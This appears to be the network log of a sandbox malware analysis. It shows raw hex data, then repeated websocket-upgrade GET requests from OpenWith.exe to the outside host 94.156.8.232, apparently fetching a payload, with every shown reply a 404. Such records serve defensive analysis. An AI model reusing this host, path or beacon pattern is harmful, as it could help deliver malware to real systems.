                      2024-05-23 18:15:08 UTC4716INData Raw: 00 00 01 00 00 00 00 00 fe ff 00 00 00 00 ff ff 01 00 03 00 ff ff ff ff 03 00 00 00 fd ff 01 00 05 00 ff ff fc ff 01 00 01 00 00 00 00 00 ff ff fe ff 01 00 02 00 00 00 ff ff ff ff 00 00 01 00 01 00 01 00 fe ff ff ff 03 00 05 00 ff ff fc ff 02 00 02 00 ff ff fe ff fe ff fe ff 03 00 02 00 ff ff ff ff 01 00 03 00 01 00 ff ff fe ff 00 00 03 00 fe ff fe ff 02 00 03 00 ff ff fe ff 03 00 01 00 fe ff 00 00 01 00 01 00 00 00 00 00 01 00 ff ff 00 00 03 00 ff ff fc ff 03 00 04 00 ff ff fc ff 03 00 03 00 ff ff ff ff 01 00 00 00 00 00 03 00 00 00 ff ff 01 00 02 00 00 00 fe ff 01 00 00 00 fe ff ff ff 02 00 00 00 ff ff ff ff 00 00 01 00 00 00 ff ff 00 00 00 00 fe ff 01 00 02 00 fe ff fd ff 02 00 01 00 fc ff 00 00 02 00 ff ff fe ff 03 00 fe ff ff ff 02 00 ff ff fc ff 00
                      Data Ascii:
                      2024-05-23 18:15:08 UTC5895INData Raw: 02 00 ff ff fe ff 03 00 00 00 ff ff 00 00 02 00 01 00 fd ff 00 00 05 00 ff ff fd ff 02 00 04 00 fc ff fd ff 03 00 02 00 ff ff ff ff 01 00 02 00 00 00 fe ff fe ff 03 00 01 00 fe ff 01 00 02 00 01 00 ff ff ff ff 03 00 00 00 ff ff fe ff 00 00 01 00 00 00 01 00 fe ff fe ff 02 00 00 00 fe ff 01 00 00 00 fe ff 00 00 01 00 ff ff ff ff 00 00 00 00 fe ff 01 00 00 00 fe ff fe ff 00 00 00 00 01 00 00 00 ff ff 00 00 02 00 fe ff fd ff 01 00 03 00 ff ff fc ff 00 00 03 00 00 00 ff ff fd ff 00 00 03 00 fe ff 00 00 00 00 ff ff 00 00 04 00 fe ff fb ff 03 00 04 00 fc ff fe ff 02 00 00 00 ff ff fe ff 01 00 00 00 01 00 fe ff ff ff 03 00 00 00 ff ff 01 00 00 00 ff ff 01 00 01 00 ff ff 01 00 00 00 ff ff 00 00 03 00 00 00 ff ff fe ff 00 00 02 00 01 00 fe ff fc ff 00 00 03 00 00
                      Data Ascii:
                      2024-05-23 18:15:08 UTC7074INData Raw: ff 01 00 02 00 00 00 fe ff 00 00 00 00 fe ff fe ff 02 00 02 00 fe ff fd ff fe ff 04 00 04 00 fb ff f8 ff 05 00 08 00 fa ff f9 ff 05 00 04 00 fd ff fc ff 02 00 00 00 fd ff 01 00 03 00 ff ff fd ff 01 00 04 00 00 00 ff ff 01 00 01 00 00 00 00 00 01 00 ff ff fe ff 00 00 00 00 00 00 01 00 ff ff 01 00 00 00 01 00 01 00 01 00 ff ff ff ff 02 00 02 00 fe ff ff ff 01 00 00 00 00 00 00 00 00 00 fe ff 01 00 03 00 00 00 ff ff 01 00 02 00 01 00 fe ff 00 00 02 00 00 00 ff ff 01 00 03 00 fc ff fe ff 05 00 02 00 fd ff fe ff 00 00 02 00 00 00 fe ff fc ff fe ff 02 00 03 00 fe ff fe ff 00 00 01 00 00 00 00 00 00 00 00 00 00 00 fe ff 01 00 02 00 00 00 fc ff ff ff 05 00 03 00 fd ff fd ff 04 00 02 00 fd ff ff ff 02 00 00 00 ff ff ff ff 00 00 01 00 ff ff 00 00 00 00 ff ff fe ff
                      Data Ascii:
                      2024-05-23 18:15:08 UTC8253INData Raw: ff 00 00 01 00 00 00 fe ff fe ff 01 00 02 00 01 00 fc ff fe ff 03 00 02 00 fe ff fe ff 01 00 02 00 01 00 ff ff 00 00 01 00 00 00 00 00 fe ff fe ff 01 00 02 00 00 00 fe ff 00 00 00 00 00 00 01 00 00 00 01 00 01 00 00 00 00 00 00 00 01 00 ff ff fe ff 01 00 03 00 01 00 fe ff 01 00 00 00 01 00 fe ff 01 00 00 00 ff ff fe ff 03 00 03 00 fd ff ff ff 02 00 01 00 fe ff 01 00 03 00 fe ff ff ff 02 00 01 00 fe ff 01 00 03 00 fc ff fe ff 04 00 03 00 fd ff ff ff 02 00 00 00 01 00 00 00 ff ff ff ff 00 00 02 00 01 00 fb ff fe ff 04 00 02 00 fc ff ff ff 02 00 00 00 00 00 00 00 fd ff 01 00 04 00 01 00 fd ff fc ff 02 00 02 00 ff ff fe ff 01 00 03 00 00 00 fe ff 01 00 ff ff 01 00 03 00 01 00 fc ff 00 00 03 00 fe ff fe ff 02 00 00 00 fe ff 01 00 01 00 01 00 00 00 ff ff fe ff
                      Data Ascii:
                      2024-05-23 18:15:08 UTC9432INData Raw: 0e 07 d9 fc fb 06 d9 fb 59 07 d0 fa 27 08 fb f9 74 09 3e f9 f3 0a bb f8 77 0c 9d f8 ec 0d dc f8 43 0f 30 f9 f9 0f 6c f9 12 10 9a f9 96 0f 5f f9 6a 0e b7 f8 bf 0c 16 f8 2c 0b 2f f8 9f 0a 31 f9 42 0b ef fa 1e 0d 2e fd d4 0f 4a ff c6 12 ba 00 40 15 fc 00 b0 16 e9 ff ab 16 dd fd 84 15 c7 fb d0 13 13 fa 26 12 c4 f8 57 10 c1 f7 7d 0e 31 f7 e0 0c df f6 79 0b 77 f6 41 0a eb f5 3f 09 6c f5 ce 08 3f f5 29 09 81 f5 74 0a 56 f6 8f 0c 38 f7 de 0e ea f7 ef 10 42 f8 70 12 54 f8 6d 13 4c f8 ec 13 0a f8 e5 13 74 f7 45 13 98 f6 11 12 6c f5 71 10 e7 f3 47 0e eb f1 9c 0b 20 f0 03 09 07 ef fc 06 00 ef d1 05 eb ef 5f 05 d5 f1 a5 05 29 f4 04 06 5c f6 03 06 60 f8 8e 05 5a fa 0d 05 41 fc 70 04 b8 fd a6 03 c9 fe c5 02 55 ff f5 01 9a ff 8c 01 97 ff b3 01 1e ff 36 02 12 fe f4 02 06
                      Data Ascii: Y't>wC0l_j,/1B.J@&W}1ywA?l?)tV8BpTmLtElqG _)\`ZApU6
                      2024-05-23 18:15:08 UTC10611INData Raw: f2 fe 07 fb 4a ff 16 fb 85 ff 5a fb ce ff f1 fb 3e 00 de fc 14 01 48 fe 52 02 c1 ff e1 03 f6 00 66 05 a0 01 a3 06 e3 01 a9 07 de 01 5e 08 ca 01 fd 08 f0 01 95 09 67 02 3c 0a ce 02 72 0a c9 02 e6 09 3d 02 c6 08 8e 01 a0 07 c0 00 b3 06 c3 ff d9 05 92 fe 24 05 c0 fd f4 04 72 fd 68 05 88 fd 2f 06 da fd ed 06 40 fe 8f 07 ad fe fe 07 de fe 53 08 0b ff b3 08 2f ff 24 09 1a ff 61 09 79 fe 14 09 89 fd 62 08 2f fc 23 07 79 fa 26 05 72 f8 a7 02 bd f6 1f 00 5b f5 fe fd 98 f4 70 fc cd f4 fc fb 19 f6 c4 fc c6 f7 40 fe 1e f9 b2 ff 08 fa 16 01 b3 fa 50 02 a6 fa e2 02 c0 f9 92 02 a5 f8 ee 01 32 f8 c0 01 44 f8 e0 01 94 f8 fa 01 b4 f8 f9 01 f7 f8 17 02 f1 f8 1e 02 77 f8 a4 01 4c f7 7b 00 ba f5 cb fe f7 f3 d3 fc 75 f2 e8 fa 98 f1 76 f9 8d f1 c5 f8 ca f1 92 f8 db f1 a3 f8 89
                      Data Ascii: JZ>HRf^g<r=$rh/@S/$ayb/#y&r[p@P2DwL{uv
                      2024-05-23 18:15:08 UTC11790INData Raw: fa 99 f9 49 f9 f3 f7 5b f8 2a f6 1a f8 ab f4 8e f8 bf f3 9c f9 1f f3 22 fb f0 f2 f0 fc 23 f3 8d fe bb f3 e5 ff 6b f4 3d 01 78 f5 df 02 12 f7 60 04 d3 f8 5b 05 4b fa a8 05 9e fb 4c 05 b1 fc 01 04 1d fd 34 02 ab fc 8d 00 ad fb 81 ff 50 fa ea fe 7e f8 cf fe a3 f6 3c ff 7a f5 0b 00 4d f5 d2 00 88 f5 a2 01 c5 f5 c6 02 01 f6 5a 04 5d f6 d0 05 75 f6 33 07 33 f6 c3 08 ed f5 9b 0a d9 f5 04 0c 15 f6 db 0c e1 f6 75 0d 8b f8 10 0e b0 fa 59 0e 87 fc 23 0e bb fd 8d 0d 59 fe 67 0c 2e fe 7d 0a 0b fd f7 07 7f fb 83 05 40 fa b0 03 8a f9 b8 02 4a f9 ad 02 95 f9 41 03 72 fa ec 03 46 fb 10 04 42 fb c8 03 4e fa ab 03 53 f9 e4 03 21 f9 25 04 b1 f9 44 04 a6 fa 63 04 aa fb 60 04 57 fc bf 03 57 fc 8f 02 a8 fb 34 01 a0 fa b0 ff 87 f9 32 fe 9a f8 ef fc 70 f8 4f fc 29 f9 fe fb 4e fa
                      Data Ascii: I[*"#k=x`[KL4P~<zMZ]u33uY#Yg.}@JArFBNS!%Dc`WW42pO)N


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      1192.168.2.64970794.156.8.2324431880C:\Windows\System32\OpenWith.exe
                      TimestampBytes transferredDirectionData
                      2024-05-23 18:15:27 UTC469OUTGET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
                      Host: 94.156.8.232
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
                      Upgrade: websocket
                      Connection: upgrade
                      Sec-Websocket-Version: 13
                      Sec-Websocket-Key: xU2b84xhXZbqQYI
                      2024-05-23 18:15:28 UTC170INHTTP/1.1 404 Not Found
                      Content-Type: text/html; charset=utf-8
                      Server: Microsoft-IIS/8.0
                      Date: Thu, 23 May 2024 18:15:27 GMT
                      Content-Length: 166
                      Connection: close
                      2024-05-23 18:15:28 UTC166INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 4d 69 63 72 6f 73 6f 66 74 2d 49 49 53 2f 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                      Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>Microsoft-IIS/8.0</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      2192.168.2.64970894.156.8.2324431880C:\Windows\System32\OpenWith.exe
                      TimestampBytes transferredDirectionData
                      2024-05-23 18:15:34 UTC469OUTGET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
                      Host: 94.156.8.232
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
                      Upgrade: websocket
                      Connection: upgrade
                      Sec-Websocket-Version: 13
                      Sec-Websocket-Key: RAgFd01qjbFHl5s
                      2024-05-23 18:15:35 UTC170INHTTP/1.1 404 Not Found
                      Content-Type: text/html; charset=utf-8
                      Server: Microsoft-IIS/8.0
                      Date: Thu, 23 May 2024 18:15:34 GMT
                      Content-Length: 166
                      Connection: close
                      2024-05-23 18:15:35 UTC166INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 4d 69 63 72 6f 73 6f 66 74 2d 49 49 53 2f 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                      Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>Microsoft-IIS/8.0</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      3192.168.2.64970994.156.8.2324431880C:\Windows\System32\OpenWith.exe
                      TimestampBytes transferredDirectionData
                      2024-05-23 18:15:41 UTC469OUTGET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
                      Host: 94.156.8.232
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
                      Upgrade: websocket
                      Connection: upgrade
                      Sec-Websocket-Version: 13
                      Sec-Websocket-Key: sW1tFC9u4h8HrYr
                      2024-05-23 18:15:41 UTC170INHTTP/1.1 404 Not Found
                      Content-Type: text/html; charset=utf-8
                      Server: Microsoft-IIS/8.0
                      Date: Thu, 23 May 2024 18:15:41 GMT
                      Content-Length: 166
                      Connection: close
                      2024-05-23 18:15:41 UTC166INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 4d 69 63 72 6f 73 6f 66 74 2d 49 49 53 2f 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                      Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>Microsoft-IIS/8.0</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      4192.168.2.64971094.156.8.2324431880C:\Windows\System32\OpenWith.exe
                      TimestampBytes transferredDirectionData
                      2024-05-23 18:15:47 UTC469OUTGET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
                      Host: 94.156.8.232
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
                      Upgrade: websocket
                      Connection: upgrade
                      Sec-Websocket-Version: 13
                      Sec-Websocket-Key: M8ftLICEWZ7XZ6c
                      2024-05-23 18:15:47 UTC170INHTTP/1.1 404 Not Found
                      Content-Type: text/html; charset=utf-8
                      Server: Microsoft-IIS/8.0
                      Date: Thu, 23 May 2024 18:15:47 GMT
                      Content-Length: 166
                      Connection: close
                      2024-05-23 18:15:47 UTC166INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 4d 69 63 72 6f 73 6f 66 74 2d 49 49 53 2f 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                      Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>Microsoft-IIS/8.0</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      5192.168.2.64971194.156.8.2324431880C:\Windows\System32\OpenWith.exe
                      TimestampBytes transferredDirectionData
                      2024-05-23 18:15:53 UTC469OUTGET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
                      Host: 94.156.8.232
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
                      Upgrade: websocket
                      Connection: upgrade
                      Sec-Websocket-Version: 13
                      Sec-Websocket-Key: Uu0iaFdbG5AryZb
                      2024-05-23 18:15:53 UTC170INHTTP/1.1 404 Not Found
                      Content-Type: text/html; charset=utf-8
                      Server: Microsoft-IIS/8.0
                      Date: Thu, 23 May 2024 18:15:53 GMT
                      Content-Length: 166
                      Connection: close
                      2024-05-23 18:15:53 UTC166INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 4d 69 63 72 6f 73 6f 66 74 2d 49 49 53 2f 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                      Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>Microsoft-IIS/8.0</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      6192.168.2.64971394.156.8.2324431880C:\Windows\System32\OpenWith.exe
                      TimestampBytes transferredDirectionData
                      2024-05-23 18:15:59 UTC469OUTGET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
                      Host: 94.156.8.232
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
                      Upgrade: websocket
                      Connection: upgrade
                      Sec-Websocket-Version: 13
                      Sec-Websocket-Key: wmg987RLpbyqFSI
                      2024-05-23 18:16:00 UTC170INHTTP/1.1 404 Not Found
                      Content-Type: text/html; charset=utf-8
                      Server: Microsoft-IIS/8.0
                      Date: Thu, 23 May 2024 18:15:59 GMT
                      Content-Length: 166
                      Connection: close
                      2024-05-23 18:16:00 UTC166INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 4d 69 63 72 6f 73 6f 66 74 2d 49 49 53 2f 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                      Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>Microsoft-IIS/8.0</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      7192.168.2.64971494.156.8.2324431880C:\Windows\System32\OpenWith.exe
                      TimestampBytes transferredDirectionData
                      2024-05-23 18:16:06 UTC469OUTGET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
                      Host: 94.156.8.232
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
                      Upgrade: websocket
                      Connection: upgrade
                      Sec-Websocket-Version: 13
                      Sec-Websocket-Key: Q3ZCdcjUNS1IbZW
                      2024-05-23 18:16:06 UTC170INHTTP/1.1 404 Not Found
                      Content-Type: text/html; charset=utf-8
                      Server: Microsoft-IIS/8.0
                      Date: Thu, 23 May 2024 18:16:06 GMT
                      Content-Length: 166
                      Connection: close
                      2024-05-23 18:16:06 UTC166INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 4d 69 63 72 6f 73 6f 66 74 2d 49 49 53 2f 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                      Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>Microsoft-IIS/8.0</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      8192.168.2.64971594.156.8.2324431880C:\Windows\System32\OpenWith.exe
                      TimestampBytes transferredDirectionData
                      2024-05-23 18:16:13 UTC469OUTGET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
                      Host: 94.156.8.232
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
                      Upgrade: websocket
                      Connection: upgrade
                      Sec-Websocket-Version: 13
                      Sec-Websocket-Key: YpfXF0WYwZtHMSW
                      2024-05-23 18:16:13 UTC170INHTTP/1.1 404 Not Found
                      Content-Type: text/html; charset=utf-8
                      Server: Microsoft-IIS/8.0
                      Date: Thu, 23 May 2024 18:16:13 GMT
                      Content-Length: 166
                      Connection: close
                      2024-05-23 18:16:13 UTC166INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 4d 69 63 72 6f 73 6f 66 74 2d 49 49 53 2f 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                      Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>Microsoft-IIS/8.0</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      9192.168.2.64971694.156.8.2324431880C:\Windows\System32\OpenWith.exe
                      TimestampBytes transferredDirectionData
                      2024-05-23 18:16:19 UTC469OUTGET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
                      Host: 94.156.8.232
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
                      Upgrade: websocket
                      Connection: upgrade
                      Sec-Websocket-Version: 13
                      Sec-Websocket-Key: gBYpLgo7UasXiuG
                      2024-05-23 18:16:19 UTC170INHTTP/1.1 404 Not Found
                      Content-Type: text/html; charset=utf-8
                      Server: Microsoft-IIS/8.0
                      Date: Thu, 23 May 2024 18:16:19 GMT
                      Content-Length: 166
                      Connection: close
                      2024-05-23 18:16:19 UTC166INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 4d 69 63 72 6f 73 6f 66 74 2d 49 49 53 2f 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                      Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>Microsoft-IIS/8.0</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      10192.168.2.64971794.156.8.2324431880C:\Windows\System32\OpenWith.exe
                      TimestampBytes transferredDirectionData
                      2024-05-23 18:16:25 UTC469OUTGET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
                      Host: 94.156.8.232
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
                      Upgrade: websocket
                      Connection: upgrade
                      Sec-Websocket-Version: 13
                      Sec-Websocket-Key: TYefaI1F0MWWonG
                      2024-05-23 18:16:25 UTC170INHTTP/1.1 404 Not Found
                      Content-Type: text/html; charset=utf-8
                      Server: Microsoft-IIS/8.0
                      Date: Thu, 23 May 2024 18:16:25 GMT
                      Content-Length: 166
                      Connection: close
                      2024-05-23 18:16:25 UTC166INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 4d 69 63 72 6f 73 6f 66 74 2d 49 49 53 2f 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                      Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>Microsoft-IIS/8.0</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      11192.168.2.64971894.156.8.2324431880C:\Windows\System32\OpenWith.exe
                      TimestampBytes transferredDirectionData
                      2024-05-23 18:16:31 UTC469OUTGET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
                      Host: 94.156.8.232
